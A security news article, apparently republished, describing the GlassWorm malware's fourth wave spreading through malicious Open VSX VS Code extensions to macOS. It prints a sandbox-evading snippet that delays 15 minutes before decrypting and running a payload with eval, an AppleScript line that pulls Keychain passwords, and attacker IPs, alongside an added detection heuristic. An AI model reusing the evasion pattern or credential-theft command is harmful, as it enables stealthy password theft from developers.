A new wave of GlassWorm malware has emerged, marking a significant shift in targeting strategy from Windows to macOS systems. This self-propagating worm, distributed through malicious VS Code extensions on the Open VSX marketplace, has already accumulated over 50,000 downloads.
The fourth wave introduces several concerning changes including encrypted payloads, hardware wallet trojanization capabilities, and sophisticated sandbox evasion techniques that allow it to bypass traditional security scanning tools.
The threat actor behind GlassWorm has proven remarkably adaptive, evolving through four distinct waves since October. Previous campaigns relied on invisible Unicode characters and compiled Rust binaries to conceal malicious code.
The latest iteration abandons these approaches in favor of AES-256-CBC encrypted JavaScript payloads specifically engineered for macOS environments.
Prettier Pro on open-vsx (Source – Koi)
Three suspicious extensions were flagged on the Open VSX marketplace: pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, all connected through shared infrastructure and encryption keys.
The malware employs a Solana blockchain-based command and control infrastructure that makes takedown efforts nearly impossible.
By posting transaction memos containing base64-encoded URLs to the blockchain, the attacker maintains decentralized control that cannot be disrupted through traditional domain blocking.
Researchers traced the infrastructure to IP address 45.32.151.157, which was also used in the third wave, confirming continuity of the threat actor.
Koi analysts identified the malware through behavioral analysis after their risk engine detected unusual patterns in extension behavior and network communications.
Encrypted Payload and Sandbox Evasion Tactics
The fourth wave introduces a clever timing mechanism designed to evade automated security analysis. Once installed, the malicious extension waits exactly 15 minutes before executing its payload.
This delay matters because most sandbox environments time out after 5 minutes, so the malware appears completely benign during automated scanning.
The code uses a hardcoded delay of 9e5 milliseconds (900,000 ms, i.e. 15 minutes); when it elapses, the AES-256-CBC encrypted payload is decrypted and executed.
setTimeout(() => {
  // Decrypt the embedded payload with the hardcoded key and IV
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  // Execute the decrypted JavaScript in the extension host
  eval(payload);
}, 9e5); // 900,000 ms = 15 minutes, longer than typical sandbox timeouts
Encrypted payload execution (Source – Koi)
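As an added defensive example (not Koi's code and not the extension's), a static triage heuristic that flags the combination Koi describes in one extension source: a setTimeout delay beyond a 5-minute sandbox budget, an AES-256-CBC createDecipheriv call, and eval of the result. Both sample sources below are constructed for the test, not taken from the real extensions.

```javascript
// Added example: static triage of VS Code extension sources for the
// GlassWorm fourth-wave pattern (delayed decrypt-and-eval). Heuristic only.
const SANDBOX_TIMEOUT_MS = 5 * 60 * 1000; // 5-minute sandbox budget cited above

// Pull the numeric delay argument out of every setTimeout(fn, delay) call,
// including exponent-form literals such as 9e5. Nested calls whose last
// argument is a bare number could confuse this, which is acceptable for triage.
function extractDelaysMs(source) {
  const re = /setTimeout\s*\([\s\S]*?,\s*(\d+(?:\.\d+)?(?:e\d+)?)\s*\)/g;
  const delays = [];
  let m;
  while ((m = re.exec(source)) !== null) {
    delays.push(Number(m[1]));
  }
  return delays;
}

function triageExtensionSource(source) {
  const delays = extractDelaysMs(source);
  const longDelays = delays.filter((d) => d >= SANDBOX_TIMEOUT_MS);
  const decrypts = /createDecipheriv\s*\(\s*['"]aes-256-cbc['"]/.test(source);
  const evals = /\beval\s*\(/.test(source);
  const indicators = [];
  if (longDelays.length) indicators.push('delayed-execution');
  if (decrypts) indicators.push('aes-256-cbc-decrypt');
  if (evals) indicators.push('eval-of-runtime-string');
  return {
    maxDelayMs: delays.length ? Math.max(...delays) : 0,
    indicators,
    // Only the full chain is treated as suspicious; each piece alone is common.
    suspicious: longDelays.length > 0 && decrypts && evals,
  };
}

// Constructed sample mirroring the shape of the published snippet.
const SAMPLE_SUSPICIOUS = `
setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);
`;

// Constructed benign sample: a short UI delay, no decryption, no eval.
const SAMPLE_BENIGN = `
setTimeout(() => { vscode.window.showInformationMessage('ready'); }, 500);
`;
```

Run triageExtensionSource over each extension's entry file; a hit warrants manual review rather than an automatic verdict.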
The payload itself is embedded at line 64 of the main extension file, encrypted with a hardcoded key and initialization vector that remains consistent across all three malicious extensions.
This shared cryptographic infrastructure confirms a single threat actor is responsible for the campaign.
After the delay period expires, the malware retrieves the current command-and-control endpoint from the Solana blockchain and executes any instructions it receives.
The macOS-specific payload includes AppleScript for stealth execution, LaunchAgents for persistence rather than Windows Registry keys, and direct access to the macOS Keychain database to retrieve stored passwords and credentials.
set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"
The malware also includes the capability to replace hardware wallet applications with trojanized versions, targeting both Ledger Live and Trezor Suite.
While the wallet replacement functionality was not fully active during testing on December 29, 2025, the code infrastructure is complete and awaiting payload uploads.
The malware validates that downloaded files exceed 1000 bytes before installation, preventing broken installations that might alert victims.
All stolen data gets staged in the temporary directory /tmp/ijewf/, compressed, and sent to the exfiltration server at 45.32.150.251/p2p for attacker retrieval.
The post Self-Propagating GlassWorm Weaponizing VS Code Extensions to Attack macOS Users appeared first on Cyber Security News.